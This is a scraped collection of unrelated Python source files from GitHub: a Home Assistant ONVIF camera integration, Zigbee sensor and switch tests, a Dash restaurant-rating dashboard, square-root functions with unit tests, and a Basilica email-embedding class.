ATTR_TILT = "tilt"
ATTR_ZOOM = "zoom"
DIR_UP = "UP"
DIR_DOWN = "DOWN"
DIR_LEFT = "LEFT"
DIR_RIGHT = "RIGHT"
ZOOM_OUT = "ZOOM_OUT"
ZOOM_IN = "ZOOM_IN"
PTZ_NONE = "NONE"
SERVICE_PTZ = "onvif_ptz"
ONVIF_DATA = "onvif"
ENTITIES = "entities"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_EXTRA_ARGUMENTS, default=DEFAULT_ARGUMENTS): cv.string,
vol.Optional(CONF_PROFILE, default=DEFAULT_PROFILE): vol.All(
vol.Coerce(int), vol.Range(min=0)
),
}
)
SERVICE_PTZ_SCHEMA = vol.Schema(
{
ATTR_ENTITY_ID: cv.entity_ids,
ATTR_PAN: vol.In([DIR_LEFT, DIR_RIGHT, PTZ_NONE]),
ATTR_TILT: vol.In([DIR_UP, DIR_DOWN, PTZ_NONE]),
ATTR_ZOOM: vol.In([ZOOM_OUT, ZOOM_IN, PTZ_NONE]),
}
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up a ONVIF camera."""
_LOGGER.debug("Setting up the ONVIF camera platform")
async def async_handle_ptz(service):
"""Handle PTZ service call."""
pan = service.data.get(ATTR_PAN, None)
tilt = service.data.get(ATTR_TILT, None)
zoom = service.data.get(ATTR_ZOOM, None)
all_cameras = hass.data[ONVIF_DATA][ENTITIES]
entity_ids = await async_extract_entity_ids(hass, service)
target_cameras = []
if not entity_ids:
target_cameras = all_cameras
else:
target_cameras = [
camera for camera in all_cameras if camera.entity_id in entity_ids
]
for camera in target_cameras:
await camera.async_perform_ptz(pan, tilt, zoom)
hass.services.async_register(
DOMAIN, SERVICE_PTZ, async_handle_ptz, schema=SERVICE_PTZ_SCHEMA
)
_LOGGER.debug("Constructing the ONVIFHassCamera")
hass_camera = ONVIFHassCamera(hass, config)
await hass_camera.async_initialize()
async_add_entities([hass_camera])
return
class ONVIFHassCamera(Camera):
"""An implementation of an ONVIF camera."""
def __init__(self, hass, config):
"""Initialize an ONVIF camera."""
super().__init__()
_LOGGER.debug("Importing dependencies")
_LOGGER.debug("Setting up the ONVIF camera component")
self._username = config.get(CONF_USERNAME)
self._password = config.get(CONF_PASSWORD)
self._host = config.get(CONF_HOST)
self._port = config.get(CONF_PORT)
self._name = config.get(CONF_NAME)
self._ffmpeg_arguments = config.get(CONF_EXTRA_ARGUMENTS)
self._profile_index = config.get(CONF_PROFILE)
self._ptz_service = None
self._input = None
_LOGGER.debug(
"Setting up the ONVIF camera device @ '%s:%s'", self._host, self._port
)
self._camera = ONVIFCamera(
self._host,
self._port,
self._username,
self._password,
"{}/wsdl/".format(os.path.dirname(onvif.__file__)),
)
async def async_initialize(self):
"""
Initialize the camera.
Initializes the camera by obtaining the input uri and connecting to
the camera. Also retrieves the ONVIF profiles.
"""
try:
_LOGGER.debug("Updating service addresses")
await self._camera.update_xaddrs()
await self.async_check_date_and_time()
await self.async_obtain_input_uri()
self.setup_ptz()
except ClientConnectionError as err:
_LOGGER.warning(
"Couldn't connect to camera '%s', but will retry later. Error: %s",
self._name,
err,
)
raise PlatformNotReady
except Fault as err:
_LOGGER.error(
"Couldn't connect to camera '%s', please verify "
"that the credentials are correct. Error: %s",
self._name,
err,
)
async def async_check_date_and_time(self):
"""Warns if camera and system date not synced."""
_LOGGER.debug("Setting up the ONVIF device management service")
devicemgmt = self._camera.create_devicemgmt_service()
_LOGGER.debug("Retrieving current camera date/time")
try:
system_date = dt_util.utcnow()
device_time = await devicemgmt.GetSystemDateAndTime()
if device_time:
cdate = device_time.UTCDateTime
cam_date = dt.datetime(
cdate.Date.Year,
cdate.Date.Month,
cdate.Date.Day,
cdate.Time.Hour,
cdate.Time.Minute,
cdate.Time.Second,
0,
dt_util.UTC,
)
_LOGGER.debug("Camera date/time: %s", cam_date)
_LOGGER.debug("System date/time: %s", system_date)
dt_diff = cam_date - system_date
dt_diff_seconds = dt_diff.total_seconds()
if dt_diff_seconds > 5:
_LOGGER.warning(
"The date/time on the camera is '%s', "
"which is different from the system '%s', "
"this could lead to authentication issues",
cam_date,
system_date,
)
except ServerDisconnectedError as err:
_LOGGER.warning(
"Couldn't get camera '%s' date/time. Error: %s", self._name, err
)
async def async_obtain_input_uri(self):
"""Set the input uri for the camera."""
_LOGGER.debug(
"Connecting with ONVIF Camera: %s on port %s", self._host, self._port
)
try:
_LOGGER.debug("Retrieving profiles")
media_service = self._camera.create_media_service()
profiles = await media_service.GetProfiles()
_LOGGER.debug("Retrieved '%d' profiles", len(profiles))
if self._profile_index >= len(profiles):
_LOGGER.warning(
"ONVIF Camera '%s' doesn't provide profile %d."
" Using the last profile.",
self._name,
self._profile_index,
)
self._profile_index = -1
_LOGGER.debug("Using profile index '%d'", self._profile_index)
_LOGGER.debug("Retrieving stream uri")
req = media_service.create_type("GetStreamUri")
req.ProfileToken = profiles[self._profile_index].token
req.StreamSetup = {
"Stream": "RTP-Unicast",
"Transport": {"Protocol": "RTSP"},
}
stream_uri = await media_service.GetStreamUri(req)
uri_no_auth = stream_uri.Uri
uri_for_log = uri_no_auth.replace("rtsp://", "rtsp://<user>:<password>@", 1)
self._input = uri_no_auth.replace(
"rtsp://", f"rtsp://{self._username}:{self._password}@", 1
)
_LOGGER.debug(
"ONVIF Camera Using the following URL for %s: %s",
self._name,
uri_for_log,
)
except exceptions.ONVIFError as err:
_LOGGER.error("Couldn't setup camera '%s'. Error: %s", self._name, err)
def setup_ptz(self):
"""Set up PTZ if available."""
_LOGGER.debug("Setting up the ONVIF PTZ service")
if self._camera.get_service("ptz", create=False) is None:
_LOGGER.debug("PTZ is not available")
else:
self._ptz_service = self._camera.create_ptz_service()
_LOGGER.debug("Completed set up of the ONVIF camera component")
async def async_perform_ptz(self, pan, tilt, zoom):
"""Perform a PTZ action on the camera."""
if self._ptz_service is None:
_LOGGER.warning("PTZ actions are not supported on camera '%s'", self._name)
return
if self._ptz_service:
pan_val = 1 if pan == DIR_RIGHT else -1 if pan == DIR_LEFT else 0
tilt_val = 1 if tilt == DIR_UP else -1 if tilt == DIR_DOWN else 0
zoom_val = 1 if zoom == ZOOM_IN else -1 if zoom == ZOOM_OUT else 0
req = {
"Velocity": {
"PanTilt": {"_x": pan_val, "_y": tilt_val},
"Zoom": {"_x": zoom_val},
}
}
try:
_LOGGER.debug(
"Calling PTZ | Pan = %d | Tilt = %d | Zoom = %d",
pan_val,
tilt_val,
zoom_val,
)
await self._ptz_service.ContinuousMove(req)
except exceptions.ONVIFError as err:
if "Bad Request" in err.reason:
self._ptz_service = None
_LOGGER.debug("Camera '%s' doesn't support PTZ.", self._name)
else:
_LOGGER.debug("Camera '%s' doesn't support PTZ.", self._name)
async def async_added_to_hass(self):
"""Handle entity addition to hass."""
_LOGGER.debug("Camera '%s' added to hass", self._name)
if ONVIF_DATA not in self.hass.data:
self.hass.data[ONVIF_DATA] = {}
self.hass.data[ONVIF_DATA][ENTITIES] = []
self.hass.data[ONVIF_DATA][ENTITIES].append(self)
async def async_camera_image(self):
"""Return a still image response from the camera."""
_LOGGER.debug("Retrieving image from camera '%s'", self._name)
ffmpeg = ImageFrame(self.hass.data[DATA_FFMPEG].binary, loop=self.hass.loop)
image = await asyncio.shield(
ffmpeg.get_image(
self._input, output_format=IMAGE_JPEG, extra_cmd=self._ffmpeg_arguments
)
)
return image
async def handle_async_mjpeg_stream(self, request):
"""Generate an HTTP MJPEG stream from the camera."""
_LOGGER.debug("Handling mjpeg stream from camera '%s'", self._name)
ffmpeg_manager = self.hass.data[DATA_FFMPEG]
stream = CameraMjpeg(ffmpeg_manager.binary, loop=self.hass.loop)
await stream.open_camera(self._input, extra_cmd=self._ffmpeg_arguments)
try:
stream_reader = await stream.get_reader()
return await async_aiohttp_proxy_stream(
self.hass,
request,
stream_reader,
ffmpeg_manager.ffmpeg_stream_content_type,
)
finally:
await stream.close()
@property
def supported_features(self):
"""Return supported features."""
if self._input:
return SUPPORT_STREAM
return 0
async def stream_source(self):
"""Return the stream source."""
return self._input
@property
def name(self):
"""Return the name of this camera."""
return self._name
```
#### File: components/zha/test_binary_sensor.py
```python
import zigpy.zcl.clusters.general as general
import zigpy.zcl.clusters.measurement as measurement
import zigpy.zcl.clusters.security as security
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.binary_sensor import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
async_init_zigpy_device,
async_test_device_join,
make_attribute,
make_entity_id,
make_zcl_header,
)
async def test_binary_sensor(hass, config_entry, zha_gateway):
"""Test zha binary_sensor platform."""
# create zigpy devices
zigpy_device_zone = await async_init_zigpy_device(
hass,
[security.IasZone.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
)
zigpy_device_occupancy = await async_init_zigpy_device(
hass,
[measurement.OccupancySensing.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
ieee="fc00:e968:6179::de52:7100",
manufacturer="FakeOccupancy",
model="FakeOccupancyModel",
)
# load up binary_sensor domain
await hass.config_entries.async_forward_entry_setup(config_entry, DOMAIN)
await hass.async_block_till_done()
# on off binary_sensor
zone_cluster = zigpy_device_zone.endpoints.get(1).ias_zone
zone_entity_id = make_entity_id(DOMAIN, zigpy_device_zone, zone_cluster)
zone_zha_device = zha_gateway.get_device(zigpy_device_zone.ieee)
# occupancy binary_sensor
occupancy_cluster = zigpy_device_occupancy.endpoints.get(1).occupancy
occupancy_entity_id = make_entity_id(
DOMAIN, zigpy_device_occupancy, occupancy_cluster
)
occupancy_zha_device = zha_gateway.get_device(zigpy_device_occupancy.ieee)
# test that the sensors exist and are in the unavailable state
assert hass.states.get(zone_entity_id).state == STATE_UNAVAILABLE
assert hass.states.get(occupancy_entity_id).state == STATE_UNAVAILABLE
await async_enable_traffic(
hass, zha_gateway, [zone_zha_device, occupancy_zha_device]
)
# test that the sensors exist and are in the off state
assert hass.states.get(zone_entity_id).state == STATE_OFF
assert hass.states.get(occupancy_entity_id).state == STATE_OFF
# test getting messages that trigger and reset the sensors
await async_test_binary_sensor_on_off(hass, occupancy_cluster, occupancy_entity_id)
# test IASZone binary sensors
await async_test_iaszone_on_off(hass, zone_cluster, zone_entity_id)
# test new sensor join
await async_test_device_join(
hass, zha_gateway, measurement.OccupancySensing.cluster_id, DOMAIN
)
async def async_test_binary_sensor_on_off(hass, cluster, entity_id):
"""Test getting on and off messages for binary sensors."""
# binary sensor on
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# binary sensor off
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
async def async_test_iaszone_on_off(hass, cluster, entity_id):
"""Test getting on and off messages for iaszone binary sensors."""
# binary sensor on
cluster.listener_event("cluster_command", 1, 0, [1])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# binary sensor off
cluster.listener_event("cluster_command", 1, 0, [0])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
```
#### File: components/zha/test_switch.py
```python
from unittest.mock import call, patch
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
async_init_zigpy_device,
async_test_device_join,
make_attribute,
make_entity_id,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
async def test_switch(hass, config_entry, zha_gateway):
"""Test zha switch platform."""
# create zigpy device
zigpy_device = await async_init_zigpy_device(
hass,
[general.OnOff.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
)
# load up switch domain
await hass.config_entries.async_forward_entry_setup(config_entry, DOMAIN)
await hass.async_block_till_done()
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = make_entity_id(DOMAIN, zigpy_device, cluster)
zha_device = zha_gateway.get_device(zigpy_device.ieee)
# test that the switch was created and that its state is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, zha_gateway, [zha_device])
# test that the state has changed from unavailable to off
assert hass.states.get(entity_id).state == STATE_OFF
# turn on at switch
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# turn off at switch
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# turn on from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
# turn on via UI
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
# turn off from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
# turn off via UI
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
# test joining a new switch to the network and HA
await async_test_device_join(hass, zha_gateway, general.OnOff.cluster_id, DOMAIN)
```
|
{
"source": "JeanFraga/DS8-Build_Week-1",
"score": 3
}
|
#### File: DS8-Build_Week-1/pages/index.py
```python
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import pandas as pd
from joblib import load
from xgboost import XGBClassifier
import category_encoders as ce
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import GridSearchCV, StratifiedKFold
from app import app
url = 'https://raw.githubusercontent.com/JeanFraga/DS8-Build_Week-1/master/notebooks/Restaurant_Consumer_Data_merged'
df = pd.read_csv(url)
pipeline1 = load('assets/xgboost_model_y1.joblib')
pipeline2 = load('assets/xgboost_model_y2.joblib')
pipeline3 = load('assets/xgboost_model_y3.joblib')
pipelines = {}
pipelines['pipeline1'] = pipeline1
pipelines['pipeline2'] = pipeline2
pipelines['pipeline3'] = pipeline3
target1 = 'rating'
target2 = 'food_rating'
target3 = 'service_rating'
X = df.drop(columns=[target1, target2, target3])
y1 = df[target1]
y2 = df[target2]
y3 = df[target3]
"""
https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
Layout in Bootstrap is controlled using the grid system. The Bootstrap grid has
twelve columns.
There are three main layout components in dash-bootstrap-components: Container,
Row, and Col.
The layout of your app should be built as a series of rows of columns.
We set md=4 indicating that on a 'medium' sized or larger screen each column
should take up a third of the width. Since we don't specify behaviour on
smaller size screens Bootstrap will allow the rows to wrap so as not to squash
the content.
"""
column1 = dbc.Col(
[
dcc.Markdown(
"""
## What rating will your restaurant receive?
This data allows us to predict the possible rating a user might give based on his profile and the information available about the restaurant. The ratings we can predict are:
1. Overal rating
2. Food rating
3. Service rating
My project revolves around the data gathered from 130 restaurants in Mexico and subsequently the rating those received from 138 users.
👉 With the graph on the right you can choose one of the 3 ratings and see what features mattered the most when predicting what rating the restaurant would receive by each user.
❗ I have chosen to only display the top 25 features used to predict each rating from a list of 113.
👇 If you would like to see how changing some of these features individually affect the rating the restaurant is likely to receive please click below.
"""
),
dcc.Link(dbc.Button('Find Out!', color='dark'), href='/predictions')
],
md=4,
)
# importances = pd.Series(pipeline1.best_estimator_.named_steps['xgbclassifier'].feature_importances_, X.columns)
# n=25
# importances = importances.sort_values()[-n:]
# importances = importances.to_frame().reset_index()
# importances.columns=['column1','column2']
# fig = px.bar(importances,y='column1',x='column2',title=f'Top {n} features', orientation='h',width=700, height=700)
# gapminder = px.data.gapminder()
# fig = px.scatter(gapminder.query("year==2007"), x="gdpPercap", y="lifeExp", size="pop", color="continent",
# hover_name="country", log_x=True, size_max=80)
column2 = dbc.Col(
[
dcc.Dropdown(
id='rating_options',
options=[
{'label': '1. Overal Rating', 'value': 'pipeline1'},
{'label': '2. Food Rating', 'value': 'pipeline2'},
{'label': '3. Service Rating', 'value': 'pipeline3'}
],
value='pipeline1'
),
dcc.Graph(id='feature_importance_graph'), # figure=fig,id='feature_importance_graph'
]
)
layout = dbc.Row([column1, column2])
@app.callback(
Output(component_id='feature_importance_graph',component_property='figure'),
[Input(component_id='rating_options', component_property='value')]
)
def feature_importance_per_rating(what_pipeline):
importances = pd.Series(pipelines[what_pipeline].best_estimator_.named_steps['xgbclassifier'].feature_importances_, X.columns)
n=25
importances = importances.sort_values()[-n:]
importances = importances.to_frame().reset_index()
importances.columns=['features','importance']
return px.bar(importances,y='features',x='importance',title=f'Top {n} features', orientation='h',width=700, height=700)
# row= X.iloc[[200]]
# explainer = shap.TreeExplainer(pipeline.best_estimator_.named_steps['xgbclassifier'])
# row_processed = pipeline.best_estimator_.named_steps['ordinalencoder'].transform(row)
# shap_values = explainer.shap_values(row_processed)
# shap.initjs()
# fig = shap.force_plot(
# base_value=explainer.expected_value[1],
# shap_values=shap_values[1],
# features=row
# )
# Get feature importances
#pipeline.best_estimator_.named_steps['xgbclassifier']
# Plot feature importances
# %matplotlib inline
# import matplotlib.pyplot as plt
```
|
{
"source": "JeanFraga/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
}
|
#### File: module4-software-testing-documentation-and-licensing/DS8_unittest_JF/sqrt.py
```python
def lazy_sqrt(x: int):
"""simplest way to do square root"""
return x**0.5
def builtin_sqrt(x: int):
"""use the math library to get the square root"""
from math import sqrt
return sqrt(x)
def newton_sqrt(x: int):
"""uses the Newton method to return square root"""
val = x
while True:
last = val
val = (val + x /val) * 0.5
if abs(val - last) < 1e-9:
break
return val
```
#### File: module4-software-testing-documentation-and-licensing/DS8_unittest_JF/sqrt_test.py
```python
import unittest
from sqrt import lazy_sqrt, builtin_sqrt, newton_sqrt
#Our class for square root functions
class SqrtTests(unittest.TestCase):
"""These are our tests for square root funcs"""
def test_sqrt9(self):
sqrt_9 = lazy_sqrt(9)
self.assertEqual(sqrt_9, 3)
def test_sqrt2(self):
self.assertAlmostEqual(newton_sqrt(2), 1.414213562)
class OtherTests(unittest.TestCase):
def test_thing(self):
pass
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JeanFraga/tagger-DS-Jean-fork",
"score": 3
}
|
#### File: tagger-DS-Jean-fork/Classes/Basillica.py
```python
from decouple import config
import basilica
class Basilica_api():
"""
Use API_KEY='SLOW_DEMO_KEY' if you do not have a basilica API_KEY
"""
columns = ['from_','subject', 'msg','content_type']
def __init__(self, df, API_KEY=config("BASILICA_KEY"), columns=columns):
self.df = df
self.API_KEY = API_KEY
self.columns = columns
def make_one_column(self):
"""
This function will make a new column named 'joined_columns' from the columns given to the class.
It will also look for a column named 'uid' to return that along with the other columns but not joined.
"""
ids_email = self.df['uid']
df_new = self.df[self.columns].copy()
df_new['joined_columns'] = df_new[df_new.columns[1:]].apply(lambda x: ','.join(x.dropna().astype(str)), axis=1)
df_new['id_email'] = ids_email
self.df = df_new
return None
def embed_basilica_to_df(self):
"""
This function will time how long basilica takes to run. For faster performance pass an API key that is functional.
Returns the df with a column named 'embedded'.
"""
self.make_one_column()
from timeit import default_timer as timer
start = timer()
column_embedded = []
for column in self.df['joined_columns']:
sentence = column
with basilica.Connection(self.API_KEY) as c:
embedding = list(c.embed_sentence(sentence, model='email', version='default', opts={}, timeout=5))
column_embedded.append(embedding)
self.df['embedded'] = column_embedded
end = timer()
print(end - start)
return self.df
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.